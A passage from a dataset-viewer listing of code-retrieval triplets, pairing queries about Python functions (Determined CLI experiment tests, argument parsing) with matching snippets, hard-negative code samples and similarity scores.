Dataset columns (types and min/max lengths as shown in the dataset viewer):

- query: string (length 9 to 9.05k)
- document: string (length 10 to 222k)
- metadata: dict
- negatives: sequence (length 30)
- negative_scores: sequence (length 30)
- document_score: string (length 4 to 10)
- document_rank: string (2 distinct values)
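Each row pairs a natural-language query with a matching code document, thirty mined hard negatives, and retrieval scores. Below is a minimal sketch of loading and inspecting one row with the `datasets` library; the dataset id is a hypothetical placeholder, not the published path.

from datasets import load_dataset

# "org/code-query-triplets" is a hypothetical placeholder id.
ds = load_dataset("org/code-query-triplets", split="train")

row = ds[0]
print(row["query"])                  # natural-language description of a function
print(row["document"][:200])         # matching code snippet (truncated for display)
print(len(row["negatives"]))         # 30 hard negatives per row
print(row["document_score"], row["document_rank"])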
query: Runs the `det experiment describe` CLI command on a finished experiment. Will raise an exception if `det experiment describe` encounters a traceback failure.
document:
def run_describe_cli_tests(experiment_id: int) -> None:
    # "det experiment describe" without metrics.
    with tempfile.TemporaryDirectory() as tmpdir:
        subprocess.check_call(
            [
                "det",
                "-m",
                conf.make_master_url(),
                "experiment",
                "describe",
                str(experiment_id),
                "--outdir",
                tmpdir,
            ]
        )

        assert os.path.exists(os.path.join(tmpdir, "experiments.csv"))
        assert os.path.exists(os.path.join(tmpdir, "workloads.csv"))
        assert os.path.exists(os.path.join(tmpdir, "trials.csv"))

    # "det experiment describe" with metrics.
    with tempfile.TemporaryDirectory() as tmpdir:
        subprocess.check_call(
            [
                "det",
                "-m",
                conf.make_master_url(),
                "experiment",
                "describe",
                str(experiment_id),
                "--metrics",
                "--outdir",
                tmpdir,
            ]
        )

        assert os.path.exists(os.path.join(tmpdir, "experiments.csv"))
        assert os.path.exists(os.path.join(tmpdir, "workloads.csv"))
        assert os.path.exists(os.path.join(tmpdir, "trials.csv"))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def describe():", "def describe(self, *args, **kwargs):\n\t\treturn self.data.describe(*args, **kwargs)", "def test_describe_model(self):\n\t\tdetails = self.watcher.describe()\n\t\tprint(details)\n\t\tself.assertEqual(len(details), 11)", "def test_recognize_describe(self):\n pass", "def test_describe_diagnostics():\n\n m = pyqg.QGModel(1)\n m.describe_diagnostics()", "def run_list_cli_tests(experiment_id: int) -> None:\n\n subprocess.check_call(\n [\"det\", \"-m\", conf.make_master_url(), \"experiment\", \"list-trials\", str(experiment_id)]\n )\n\n subprocess.check_call(\n [\"det\", \"-m\", conf.make_master_url(), \"experiment\", \"list-checkpoints\", str(experiment_id)]\n )\n subprocess.check_call(\n [\n \"det\",\n \"-m\",\n conf.make_master_url(),\n \"experiment\",\n \"list-checkpoints\",\n \"--best\",\n str(1),\n str(experiment_id),\n ]\n )", "async def describe_dbinstance_tdeinfo_async(\n self,\n request: dds_20151201_models.DescribeDBInstanceTDEInfoRequest,\n ) -> dds_20151201_models.DescribeDBInstanceTDEInfoResponse:\n runtime = util_models.RuntimeOptions()\n return await self.describe_dbinstance_tdeinfo_with_options_async(request, runtime)", "def describe(model_element, **kwargs):\n model_descriptor = ModelDescriptor(**kwargs)\n return model_descriptor.describe(model_element)", "def describe(dir):\n try:\n # decode() is needed here for Python3 compatibility. In Python2,\n # str and bytes are the same type, but not in Python3.\n # Popen.communicate() returns a bytes instance, which needs to be\n # decoded into text data first in Python3. And this decode() won't\n # hurt Python2.\n return command_output(['git', 'describe'], dir).rstrip().decode()\n except:\n try:\n return command_output(\n ['git', 'rev-parse', 'HEAD'], dir).rstrip().decode()\n except:\n return 'unknown hash, ' + datetime.date.today().isoformat()", "def describe(self, model_element, **kwargs):\n if isinstance(model_element, model.ScenarioOutline):\n return self.describe_scenario_outline(model_element, **kwargs)\n elif isinstance(model_element, model.Scenario):\n return self.describe_scenario(model_element, **kwargs)\n raise AttributeError(\"{0} is nor supported yet\".format(\n model_element.__class__.__name__))", "def cli(argv):\r\n args = get_args(argv)\r\n verbosity = \"summary\"\r\n if args.verbose:\r\n verbosity = \"report\"\r\n report = evaluate(args.design, verbosity)\r\n print json.dumps(report, indent=4)", "def describe_dbinstance_tdeinfo(\n self,\n request: dds_20151201_models.DescribeDBInstanceTDEInfoRequest,\n ) -> dds_20151201_models.DescribeDBInstanceTDEInfoResponse:\n runtime = util_models.RuntimeOptions()\n return self.describe_dbinstance_tdeinfo_with_options(request, runtime)", "async def describe_dbinstance_tdeinfo_with_options_async(\n self,\n request: dds_20151201_models.DescribeDBInstanceTDEInfoRequest,\n runtime: util_models.RuntimeOptions,\n ) -> dds_20151201_models.DescribeDBInstanceTDEInfoResponse:\n UtilClient.validate_model(request)\n query = {}\n if not UtilClient.is_unset(request.dbinstance_id):\n query['DBInstanceId'] = request.dbinstance_id\n if not UtilClient.is_unset(request.owner_account):\n query['OwnerAccount'] = request.owner_account\n if not UtilClient.is_unset(request.owner_id):\n query['OwnerId'] = request.owner_id\n if not UtilClient.is_unset(request.resource_owner_account):\n query['ResourceOwnerAccount'] = request.resource_owner_account\n if not UtilClient.is_unset(request.resource_owner_id):\n query['ResourceOwnerId'] = request.resource_owner_id\n if not 
UtilClient.is_unset(request.security_token):\n query['SecurityToken'] = request.security_token\n req = open_api_models.OpenApiRequest(\n query=OpenApiUtilClient.query(query)\n )\n params = open_api_models.Params(\n action='DescribeDBInstanceTDEInfo',\n version='2015-12-01',\n protocol='HTTPS',\n pathname='/',\n method='POST',\n auth_type='AK',\n style='RPC',\n req_body_type='formData',\n body_type='json'\n )\n return TeaCore.from_map(\n dds_20151201_models.DescribeDBInstanceTDEInfoResponse(),\n await self.call_api_async(params, req, runtime)\n )", "def test_complete_experiment():\n try:\n # init logging\n tf.logging.set_verbosity(tf.logging.ERROR)\n\n # configure experiment\n run_experiment.load_gin_configs(PARAMS, [])\n # create the agent and run experiment\n runner = checkpoint_runner.create_runner(BASE_DIR)\n runner.run_experiment()\n except Exception:\n pytest.fail(\n 'Running experiments in Dopamine failed!')", "def describe(self) -> str:", "def show_set_down_info() -> None:\n\n print('----------------------------------------------------------')\n print(f'Test environment destroyed. Driver will be shut down.')\n print(f'Run completed at: {datetime.now()}')", "def describe_dataset(self, dataset_id=None):\n url = self.prism_endpoint + \"/datasets\"\n\n if dataset_id is not None:\n url = url + \"/\" + dataset_id + \"/describe\"\n\n headers = {\"Authorization\": \"Bearer \" + self.bearer_token}\n\n r = requests.get(url, headers=headers)\n\n if r.status_code == 200:\n logging.info(\"Successfully obtained information about your datasets\")\n return r.json()\n else:\n logging.warning(\"HTTP Error {}\".format(r.status_code))", "def do_info(self, args):\n if self.exploit is None:\n eprint(colorize('No exploit set; nothing to describe. Select an exploit with the \\'use\\' command',\n 'cyan'))\n else:\n eprint(colorize('\\n ' + self.exploit.DESCRIPTION + '\\n', 'green'))", "def test_det(self, a, dete):\n detc = det(a)\n assert np.isclose(detc, dete)", "def run_main(f, help_str):\n if len(sys.argv) not in [5, 6]:\n print('Usage: python logdet.py n d q eps [seed]')\n print()\n print('n > 8 is the size of the Toeplitz submatrix')\n print('d > 0 is the size of the dense submatrix')\n print('q > 0 is the number of dense-Toeplitz Kronecker products')\n print(' to sum together for the system')\n print('eps >= 0 is the constant diagonal perturbation (a float)')\n print(' added in (higher eps -> better conditioning).')\n print('default seed is 1234')\n print()\n print(help_str)\n print()\n print('Choose q = d = 1 and n large to test Toeplitz, mainly')\n print('Choose q = 1 and n ~ d^2 > 1 to test Kronecker, mainly')\n sys.exit(1)\n\n n = int(sys.argv[1])\n d = int(sys.argv[2])\n q = int(sys.argv[3])\n eps = float(sys.argv[4])\n seed = int(sys.argv[5]) if len(sys.argv) > 5 else 1234\n\n assert n > 8\n assert d > 0\n assert q > 0\n assert eps >= 0\n np.random.seed(seed)\n\n print('size q {} n {} d {} eps {:g}'.format(q, n, d, eps))\n\n cases = [\n ('random (well-cond) ', random_toep),\n ('linear decrease (poor-cond)', poor_cond_toep),\n ('exponentially decreasing (realistic)', exp_decr_toep)]\n\n for name, generator in cases:\n print(name)\n dense_mats = [rand_pd(d) for _ in range(q)]\n toep_tops = [generator(n) for _ in range(q)]\n my_mat = SumMatrix([Kronecker(NumpyMatrix(dense), Toeplitz(top))\n for dense, top in zip(dense_mats, toep_tops)])\n # added noise\n my_mat.orig_matvec = my_mat.matvec\n my_mat.matvec = lambda x: my_mat.orig_matvec( # pylint:disable=cell-var-from-loop\n x) + eps * x\n 
my_mat.logdet = lambda: np.log(my_mat.approx_eigs( # pylint:disable=cell-var-from-loop\n 0) + eps).sum()\n f(my_mat)", "def Run(self, args):\n identifiers = args.CONCEPTS.api.Parse().AsDict()\n\n result = apigee.APIsClient.Describe(identifiers)\n\n # Must use vars(args) to check whether there's even a revision field in the\n # parsed args namespace. It's only present for ALPHA track.\n requested_revision = None\n if \"revision\" in vars(args):\n requested_revision = args.revision\n\n # If the user didn't ask for revision data, the response from\n # APIsClient.Describe() is good enough.\n if requested_revision is None and not args.verbose:\n return result\n\n rev_nums = result[\"revision\"]\n if requested_revision is not None:\n if requested_revision not in rev_nums:\n message = \"No revision %r among API %s's revisions: %s\"%(\n requested_revision, identifiers[\"apisId\"], rev_nums)\n raise exceptions.InvalidArgumentException(\"--revision\", message)\n # No need to check whether this revision exists within the original list;\n # if there's no such revision, RevisionsClient will raise an appropriate\n # error.\n rev_nums = [requested_revision]\n\n revisions = []\n for revision in rev_nums:\n identifiers[\"revisionsId\"] = revision\n revision_result = apigee.RevisionsClient.Describe(identifiers)\n del revision_result[\"name\"]\n revisions.append(revision_result)\n del result[\"revision\"]\n result[\"revisions\"] = revisions\n\n return result", "def experiment(task, eid, event_type, output, metric, sort, output_fields):\n event_type = EVENT_TYPES[event_type]\n ServerManager.get()\n try:\n result = ServerManager.api.experiment_details(task, eid, event_type=event_type, metric=metric)\n prop_name_loc = {k: i for i, k in enumerate(output_fields)}\n result_df = experiment_to_df(exp=result, prop_name_loc=prop_name_loc, event_type=event_type, sort=sort)\n if output is None:\n click.echo(result_df)\n else:\n result_df.to_csv(output)\n except ApiException as e:\n click.echo(click.style(json.loads(e.body)['detail'], fg='red'))", "def describe_dbinstance_tdeinfo_with_options(\n self,\n request: dds_20151201_models.DescribeDBInstanceTDEInfoRequest,\n runtime: util_models.RuntimeOptions,\n ) -> dds_20151201_models.DescribeDBInstanceTDEInfoResponse:\n UtilClient.validate_model(request)\n query = {}\n if not UtilClient.is_unset(request.dbinstance_id):\n query['DBInstanceId'] = request.dbinstance_id\n if not UtilClient.is_unset(request.owner_account):\n query['OwnerAccount'] = request.owner_account\n if not UtilClient.is_unset(request.owner_id):\n query['OwnerId'] = request.owner_id\n if not UtilClient.is_unset(request.resource_owner_account):\n query['ResourceOwnerAccount'] = request.resource_owner_account\n if not UtilClient.is_unset(request.resource_owner_id):\n query['ResourceOwnerId'] = request.resource_owner_id\n if not UtilClient.is_unset(request.security_token):\n query['SecurityToken'] = request.security_token\n req = open_api_models.OpenApiRequest(\n query=OpenApiUtilClient.query(query)\n )\n params = open_api_models.Params(\n action='DescribeDBInstanceTDEInfo',\n version='2015-12-01',\n protocol='HTTPS',\n pathname='/',\n method='POST',\n auth_type='AK',\n style='RPC',\n req_body_type='formData',\n body_type='json'\n )\n return TeaCore.from_map(\n dds_20151201_models.DescribeDBInstanceTDEInfoResponse(),\n self.call_api(params, req, runtime)\n )", "def test_suite():\n test(calc_det([[2, 1],[3, 4]]), 5)", "def test_010_describe_by_invalid_pid(self):\n client = 
test_client.TestClient(context.node[\"baseurl\"])\n # The exception is caused by the body being empty since describe() uses a\n # HEAD request.\n with pytest.raises(xml.parsers.expat.ExpatError):\n client.describe(context.TOKEN, \"_invalid_pid_\")", "def amtool_alert_describe(self, mess, fingerprint):\n helper = AmtoolHelper(\n alertmanager_address=self.config['server_address'])\n result = helper.get_alert(fingerprint)\n self.send_card(title=result[\"annotations\"][\"title\"],\n body=result[\"annotations\"][\"description\"],\n # thumbnail='https://raw.githubusercontent.com/errbotio/errbot/master/docs/_static/errbot.png',\n # image='https://www.google.com/images/branding/googlelogo/2x/googlelogo_color_272x92dp.png',\n link=result[\"generatorURL\"],\n fields=result[\"labels\"].items(),\n color='blue',\n in_reply_to=mess)", "def dataset_statistics(dataset):\n print (dataset.describe())", "def describe(f, verbose=False):\n return better_arg_spec(f, verbose)", "def _describe_command(self, command, **options):\n command.get_synopsis(True)\n command.get_synopsis(False)\n command.merge_application_definition(False)\n\n self._write_text('<comment>Usage:</comment>', **options)\n for usage in [command.get_synopsis(True)] + command.get_aliases() + command.get_usages():\n self._write_text('\\n')\n self._write_text(' %s' % usage, **options)\n\n self._write_text('\\n')\n\n definition = command.get_native_definition()\n if definition.get_options() or definition.get_arguments():\n self._write_text('\\n')\n self._describe_input_definition(definition, **options)\n self._write_text('\\n')\n\n help = command.get_processed_help()\n if help:\n self._write_text('\\n')\n self._write_text('<comment>Help:</comment>', **options)\n self._write_text('\\n')\n self._write_text(' %s' % help.replace('\\n', '\\n '), **options)\n self._write_text('\\n')", "def test_view_diseases(mock_app):\n\n runner = mock_app.test_cli_runner()\n assert runner\n\n # Test CLI\n result = runner.invoke(cli, [\"view\", \"diseases\"])\n assert result.exit_code == 0\n # NO OMIM term should be preloaded in database\n assert \"No diseases found\" in result.output\n\n # insert one in database\n omim_term = {\n \"_id\": \"OMIM:193040\",\n \"disease_id\": \"OMIM:193040\",\n \"description\": \"Cholestasis progressive canalicular\",\n \"source\": \"OMIM\",\n \"genes\": [12690],\n \"inheritance\": None,\n \"hpo_terms\": None,\n }\n store.disease_term_collection.insert_one(omim_term)\n\n # Test CLI\n result = runner.invoke(cli, [\"view\", \"diseases\"])\n assert result.exit_code == 0\n # OMIM disease should now be found\n assert \"OMIM:193040\" in result.output" ]
[ "0.5586464", "0.5564415", "0.5341794", "0.5270411", "0.5181873", "0.5082891", "0.5071718", "0.50258327", "0.50245225", "0.4985327", "0.49451223", "0.49108976", "0.48686293", "0.48666832", "0.48470518", "0.48347655", "0.4822859", "0.47746998", "0.47700247", "0.47659424", "0.47639957", "0.47590598", "0.4751978", "0.47420877", "0.47381756", "0.47083387", "0.47054747", "0.47027856", "0.46673217", "0.46554247" ]
document_score: 0.7508023
document_rank: 0
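The metadata marks each row for a triplet objective over (query, document, negatives). One way such rows could be consumed is with sentence-transformers' TripletLoss; this is a sketch only, and the base model name and hyperparameters are arbitrary assumptions rather than anything specified by the dataset.

from torch.utils.data import DataLoader
from sentence_transformers import InputExample, SentenceTransformer, losses

model = SentenceTransformer("all-MiniLM-L6-v2")  # assumed base model

# Build one (anchor, positive, negative) triplet per hard negative in a row.
def row_to_examples(row):
    return [
        InputExample(texts=[row["query"], row["document"], negative])
        for negative in row["negatives"]
    ]

examples = row_to_examples(ds[0])  # `ds` as loaded in the earlier sketch
loader = DataLoader(examples, shuffle=True, batch_size=16)

model.fit(train_objectives=[(loader, losses.TripletLoss(model))], epochs=1)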
query: Runs list-related CLI commands on a finished experiment. Will raise an exception if the CLI command encounters a traceback failure.
document:
def run_list_cli_tests(experiment_id: int) -> None:
    subprocess.check_call(
        ["det", "-m", conf.make_master_url(), "experiment", "list-trials", str(experiment_id)]
    )

    subprocess.check_call(
        ["det", "-m", conf.make_master_url(), "experiment", "list-checkpoints", str(experiment_id)]
    )
    subprocess.check_call(
        [
            "det",
            "-m",
            conf.make_master_url(),
            "experiment",
            "list-checkpoints",
            "--best",
            str(1),
            str(experiment_id),
        ]
    )
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_pre_cli_list(run):\n out, err = run(dork.cli.the_predork_cli, [], *(\"\", \"-l\"))\n assert \"test.yml\" in out, \\\n \"Failed run the dork.cli.the_predork_cli method: {err}\"\\\n .format(err=err)", "def command_list(self, command):\n\n # See if the list exists and return results\n if len(command.args) > 0 and command.args[0] in LISTS:\n resp = []\n\n\n # Print out our available machines\n if command.args[0] == \"machines\":\n # Loop over controllers\n for c in self.config_list:\n\n # Get updated list of machiens\n self.config_list[c].get_machines()\n\n # Print output\n machines_tmp = self.config_list[c].machines\n\n resp.append(\"--- %s\" % c)\n for x in machines_tmp:\n name = machines_tmp[x].config.name\n m_type = machines_tmp[x].type\n profile = machines_tmp[x].config.volatility_profile\n resp.append(\" [%s] Type: %s, Profile: %s\" % (\n name, m_type, profile))\n resp.append(\"--- %s\" % c)\n\n # Print out our LO-PHI configs\n if command.args[0] == \"controllers\":\n\n if len(self.config_list) == 0:\n resp.append(\"No controllers are configured.\")\n else:\n resp.append(\"--- Available Controllers\")\n for x in self.config_list:\n resp.append(str(self.config_list[x]))\n resp.append(\"--- Available Controllers\")\n\n # Print out our running analyses\n if command.args[0] == \"analysis\":\n\n # Ensure our list\n self.update_analysis()\n\n # Loop over controllers\n for c in self.analysis_list:\n analysis, filename = self.analysis_list[c]\n\n resp.append(\"\\n[%s] %s\" % (c, filename))\n\n if len(resp) == 0:\n resp.append(\n \"No analysis scripts found in %s.\" % self.analysis_directory)\n\n return '\\n'.join(resp)\n\n else:\n return self.RESP_HEADER + \"ERROR: No such list.\\n Available lists are: %s\\n\" % LISTS", "def main_list(args):\n return list_commands(args.directory)", "def test_fixture_list_runs(tmp_sample_project):\n config_dir = tmp_sample_project\n output = subprocess.run([\"smif\", \"list\", \"-d\", config_dir], stdout=subprocess.PIPE)\n assert \"energy_water_cp_cr\" in str(output.stdout)\n assert \"energy_central\" in str(output.stdout)\n\n # Run energy_central and re-check output with optional flag for completed results\n subprocess.run([\"smif\", \"run\", \"energy_central\", \"-d\", config_dir], stdout=subprocess.PIPE)\n output = subprocess.run([\"smif\", \"list\", \"-c\", \"-d\", config_dir], stdout=subprocess.PIPE)\n assert \"energy_central *\" in str(output.stdout)", "def list_command(ctx: Any) -> None:\n pass", "def test_listCommand(self):\n acli = ArmiCLI()\n\n origout = sys.stdout\n try:\n out = io.StringIO()\n sys.stdout = out\n acli.listCommands()\n finally:\n sys.stdout = origout\n\n self.assertIn(\"run-suite\", out.getvalue())", "def experiments(ctx, **kw):\n if not ctx.invoked_subcommand:\n ctx.invoke(list_experiments, **kw)\n else:\n if _params_specified(kw):\n print(\n \"options cannot be listed before command ('%s')\"\n % ctx.invoked_subcommand)", "def run(self, commands: list[str]):\n ...", "def do_command(self, args):\n testops = dbops.Tests()\n listing = testops.list(args)\n ordering = ['test_name', 'os_type_name',\n 'test_command', 'runtime', 'timeout']\n do_list(listing, ordering)", "def test_listCommand(self):\n from armi import cli\n\n cli = cli.ArmiCLI()\n\n origout = sys.stdout\n try:\n out = io.StringIO()\n sys.stdout = out\n cli.listCommands()\n finally:\n sys.stdout = origout\n self.assertIn(\"run-suite\", out.getvalue())", "def cmd_list(args):", "def main():\n # get the params in format\n params = {key: value for key, value in 
demisto.params().items() if value is not None}\n\n LOG(f'Command being called is {demisto.command()}')\n try:\n if params.get('initial_interval') and int(params.get('initial_interval')) > 7: # type: ignore\n raise ValueError(\n f\"Retroactive timeline should be within 7 days, given value: {params.get('initial_interval')}\")\n\n client = Client(params)\n args = demisto.args()\n\n if demisto.command() == 'test-module':\n if not args.get('collection', False):\n args['collection'] = params.get('collection', '')\n return_results(get_test_response(client, args))\n\n elif demisto.command() == 'fetch-indicators':\n # fetch indicators using taxii service\n indicators = fetch_indicators(client)\n # we submit the indicators in batches\n for b in batch(indicators, batch_size=2000):\n demisto.createIndicators(b)\n\n elif demisto.command() == 'cyble-vision-fetch-taxii':\n # fetch indicators using taxii service\n validate_input(args)\n return_results(cyble_fetch_taxii(client, args))\n\n elif demisto.command() == 'cyble-vision-get-collection-names':\n # fetch collections using taxii service\n return_results(get_feed_collection(client))\n\n # Log exceptions\n except Exception as e:\n return_error(f'Failed to execute {demisto.command()} command. Error: {str(e)}')", "async def list(self, ctx: MyContext):\n if ctx.subcommand_passed is None:\n await ctx.send_help(\"wormhole list\")", "def main():\n args = parse_command_line()\n expt_config = load_config(args.experiment_config_path)\n run_cli(RunOptions.from_dict(expt_config))", "def cli() -> None:", "def cli() -> None:", "def main() -> None:\n commands: Dict[str, Callable] = {\n 'swis-alert-list': swis_alert_list_command,\n 'swis-event-list': swis_event_list_command,\n 'swis-query': swis_query_command\n }\n command = demisto.command()\n demisto.debug(f'Command being called is {command}')\n try:\n params = demisto.params()\n args = demisto.args()\n server = params['server']\n credentials = params.get('credentials', {})\n\n verify_certificate = not params.get('insecure', False)\n proxy = params.get('proxy', False)\n\n client = Client(\n server=server,\n credentials=credentials,\n verify=verify_certificate,\n proxy=proxy)\n\n for key, value in args.items():\n if isinstance(value, str):\n args[key] = value.strip()\n\n remove_nulls_from_dictionary(args)\n\n if command == 'test-module':\n # This is the call made when pressing the integration Test button.\n result = test_module(client, params)\n return_results(result)\n\n elif command in commands:\n return_results(commands[command](client, args))\n\n elif command == 'fetch-incidents':\n last_run = demisto.getLastRun()\n next_run, incidents = fetch_incidents(client, last_run, params)\n demisto.incidents(incidents)\n demisto.setLastRun(next_run)\n\n # Log exceptions and return errors\n except Exception as e:\n return_error(f'Failed to execute {demisto.command()} command.\\nError:\\n{str(e)}')", "def main():\n demisto.info('Command being called is ' + demisto.command())\n\n \"\"\"\n PARSE AND VALIDATE INTEGRATION PARAMS\n \"\"\"\n\n rest_client = RestClient(\n base_url=BASE_URL,\n verify=VERIFY_CERT,\n )\n\n try:\n if demisto.command() == 'test-module':\n test_module(rest_client)\n demisto.results('ok')\n\n elif demisto.command() == 'fetch-incidents':\n # get all tenant ids\n next_run, incidents = fetch_incidents(rest_client, demisto.getLastRun())\n demisto.setLastRun(next_run)\n demisto.incidents(incidents)\n\n elif demisto.command() == 'mad-close-incident':\n return_outputs(close_incident_command(rest_client, 
demisto.args()))\n\n elif demisto.command() == 'mad-assign-user':\n return_outputs(assign_user_command(rest_client, demisto.args()))\n\n elif demisto.command() == 'mad-remove-user':\n return_outputs(remove_user_command(rest_client, demisto.args()))\n\n elif demisto.command() == 'mad-get-incident':\n return_results(get_incident_command(rest_client, demisto.args()))\n\n elif demisto.command() == 'update-remote-system':\n return_results(update_remote_system_command(rest_client, demisto.args()))\n\n elif demisto.command() == 'get-mapping-fields':\n return_results(get_mapping_fields_command())\n\n elif demisto.command() == 'get-remote-data':\n return_results(get_remote_data_command(rest_client, demisto.args()))\n\n elif demisto.command() == 'mad-get-escalations':\n return_results(get_escalations_command(rest_client, demisto.args()))\n\n else:\n raise NotImplementedError('Command not implemented')\n\n except NotImplementedError:\n raise\n except Exception as err:\n demisto.error(traceback.format_exc()) # print the traceback\n return_error(f'Failed to execute {demisto.command()} command.\\nError:\\n{str(err)}')", "def run(self):\n try:\n self.runCommand()\n except TortugaException as ex:\n print(ex.getErrorMessage())\n raise SystemExit(ex.getErrorCode())\n except SystemExit:\n raise\n except Exception as ex:\n print(str(ex))\n raise SystemExit(-1)", "def cli():\n logger.debug('cli() called')", "def runCommand(self): \\\n # pylint: disable=no-self-use", "def do_work():\n args = sys.argv\n args = args[1:] # First element of args is the file name\n\n if len(args) == 0:\n print('You have not passed any commands in!')\n else:\n for a in args:\n if a == '--help':\n print('AWS: EC2 - S3 - List unused resources tool')\n print('Options:')\n print(' --help -> show this help menu.')\n print(' --ec2 -> show unused AWS resources in EC2.')\n print(' --s3 -> show unused AWS resources in S3')\n print(' --test -> test config with terraform')\n elif a == '--ec2':\n os.system(\"python unused_resources_aws2_ec2.py 1\")\n elif a == '--s3':\n os.system(\"python unused_resources_aws_s3.py 1\")\n elif a == '--test':\n os.system(\"cd terraform && terraform init && terraform plan && terraform apply -auto-approve && cd ..\")\n os.system(\"python unused_resources_aws_ec2.py 1\")\n os.system(\"cd terraform && terraform destroy -auto-approve\")\n else:\n print('Unrecognised argument.')", "def test_handle_multiple_subcommands(self):\n ret, code = self.testcommand.handle(\"team list edit\", user)\n self.assertEqual(ret, self.testcommand.get_help())\n self.assertEqual(code, 200)", "def cli():", "def cli():", "def cli():", "def cli():", "def cli():", "def cli():", "def cli():" ]
[ "0.61308813", "0.59608287", "0.5957649", "0.58396363", "0.5808478", "0.5768765", "0.57584125", "0.5753735", "0.5732263", "0.56613624", "0.56290406", "0.56156904", "0.5615358", "0.5497544", "0.5480825", "0.5480825", "0.5471782", "0.5451167", "0.54397607", "0.54342854", "0.54243225", "0.5422052", "0.5416624", "0.5414033", "0.5414033", "0.5414033", "0.5414033", "0.5414033", "0.5414033", "0.5414033" ]
document_score: 0.7019173
document_rank: 0
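document_score and negative_scores appear to be retriever similarity scores, and document_rank appears to count how many negatives outscore the positive document; in both rows above the positive exceeds every negative score, which matches the rank of 0. A small sketch under that assumption:

def compute_rank(document_score, negative_scores):
    # Number of negatives scoring at least as high as the positive document.
    return sum(score >= document_score for score in negative_scores)

# Row 1: document_score 0.7508023 vs. best negative 0.5586464 -> rank 0.
# Row 2: document_score 0.7019173 vs. best negative 0.61308813 -> rank 0.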
query: Handle all options in the arguments. This function returns a dictionary containing the 'input_pkg' and 'output_pkg' keys.
document:
def handle_arguments():
    result = {'input_pkg': '', 'output_pkg': ''}
    try:
        args = sys.argv[1:]
        optlist = gnu_getopt(args, 'h', ['help'])
    except GetoptError:
        print 'Error when parsing arguments.'
        more_informations()
    if len(sys.argv) < 2:
        print 'No input file.'
        more_informations()
    for option, value in optlist[0]:
        if option in ['-h', '--help']:
            usage()
    result['input_pkg'] = optlist[1][0]
    if len(sys.argv) > 3:
        result['output_pkg'] = optlist[1][1]
    return result
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def processArgs(printHelp=False):\n parser = OptionParser()\n\n parser.add_option('-i', '--input',\n dest='input',\n help='Name of the latex file, for example, document.tex',\n metavar='string')\n parser.add_option('-o', '--output',\n dest='output',\n help='Name of the output folder. Default is \"submit\"',\n metavar='string')\n parser.add_option('-x', '--xiv',\n dest='xiv',\n default=False,\n action='store_true',\n help='Converts the figures to PDFs for arXiv.org submission',\n metavar='boolean')\n parser.add_option('-m', '--margin',\n dest='margin',\n help='Size of the bounding box margin in case of arXiv.org submission. Default is 2.',\n metavar='integer')\n\n if printHelp:\n parser.print_help()\n else:\n return parser.parse_args()", "def _options(self):\r\n xmi_file = self.tb_xmi_file_name.GetValue()\r\n topic = self.tb_pragma.GetValue()\r\n package = self.tb_package.GetValue()\r\n header = self.tb_file_header.GetValue()\r\n target_folder = self.tb_target_folder.GetValue()\r\n encoding = self.tb_encoding.GetValue()\r\n \r\n return {\"topic\" : topic, \r\n \"package\" : package, \r\n \"header\" : header, \r\n \"target_folder\" : target_folder,\r\n \"encoding\" : encoding,\r\n \"xmi_file\" : xmi_file}", "def getOptionHashes(options):\n positionalArgs={}\n flaggedArgs={}\n #if options.inputFlag is None and options.taskType is not None:\n # options.inputFlag=programOptionMap[options.taskType].get('in',None)\n if options.inputFlag is not None:\n try:\n positionalArgs[int(options.inputFlag)]='in'\n except ValueError:\n flaggedArgs[options.inputFlag]='in'\n except TypeError:\n for flag in options.inputFlag:\n flaggedArgs[flag]='in'\n #if not(options.outputFlags) and options.taskType is not None:\n # options.outputFlags=programOptionMap[options.taskType].get('out',[])\n if options.outputFlags is not None:\n for outputFlag in options.outputFlags:\n try:\n positionalArgs[int(outputFlag)]='out'\n except ValueError:\n flaggedArgs[outputFlag]='out'\n except TypeError:\n for flag in outputFlag:\n flaggedArgs[flag]='out'\n #if not(options.threadsFlag) and options.taskType is not None:\n # options.threadsFlag=programOptionMap[options.taskType].get('threads',None)\n if options.threadsFlag is not None:\n try:\n positionalArgs[int(options.threadsFlag)]='threads'\n except ValueError:\n flaggedArgs[options.threadsFlag]='threads'\n except TypeError:\n for flag in options.threadsFlag:\n flaggedArgs[flag]='threads'\n if options.prefixFlag is not None:\n try:\n positionalArgs[int(options.prefixFlag)]='prefix'\n except ValueError:\n flaggedArgs[options.prefixFlag]='prefix'\n except TypeError:\n for flag in options.prefixFlag:\n flaggedArgs[flag]='prefix'\n if options.rel_paths is not None:\n for rel_path_flag in options.rel_paths:\n try:\n positionalArgs[int(rel_path_flag)]='rel'\n except ValueError:\n flaggedArgs[rel_path_flag]='rel'\n \n return (positionalArgs,flaggedArgs)", "def get_argdict(cls, toolchain, args):\n return {} # Empty must be overloaded (if required)", "def _map_args_kwargs_to_input(self, *args, **kwargs) -> Dict[str, Any]:\n input_dict = {k: v for k, v in zip(self.inputs, args)}\n input_dict.update(kwargs)\n\n return input_dict", "def process_command_line():\n # Parse arguments\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--outPath\", type=str, help=\"Output path for flat uh files with adjusted fractions\")\n parser.add_argument(\"--gridFile\", type=str, help=\"Grid File containing full domain fractions variable \")\n parser.add_argument(\"--inputFiles\", help=\"Input 
netcdf grid(s) containing fraction/uh data\")\n parser.add_argument(\"--verbose\",help=\"Make script verbose\",action=\"store_true\")\n parser.add_argument(\"--diagPath\",type=str,help=\"Path to place diagnostic outputs\")\n\n args = parser.parse_args()\n\n options = {}\n options['verbose'] = args.verbose\n \n files={}\n temp = glob.glob(args.inputFiles)\n try:\n files['gridFile'] = args.gridFile\n except:\n files['gridFile'] = False\n try:\n files['diagPath'] = args.diagPath\n if not os.path.exists(files['diagPath']):\n print 'making diagnostic directory'\n os.makedirs(files['diagPath'])\n except:\n files['diagPath'] = False\n try:\n files['diagFile'] = args.diagFile\n\n except:\n files['diagFile'] = False\n\n files['inputFiles'] = []\n for fi in temp:\n files['inputFiles'].append(os.path.basename(fi))\n files['inPath'] = os.path.dirname(fi)\n\n try:\n files['outPath'] = args.outPath\n if not os.path.exists(files['outPath']):\n print 'output directory'\n os.makedirs(files['outPath'])\n except:\n files['outPath'] = False\n \n return files,options", "def get_input_args():\n # Create Parse using ArgumentParser\n parser = ArgumentParser()\n\n # Image file path as --file_path\n # Path to test images\n # image_path = './test_images/hard-leaved_pocket_orchid.jpg'\n # 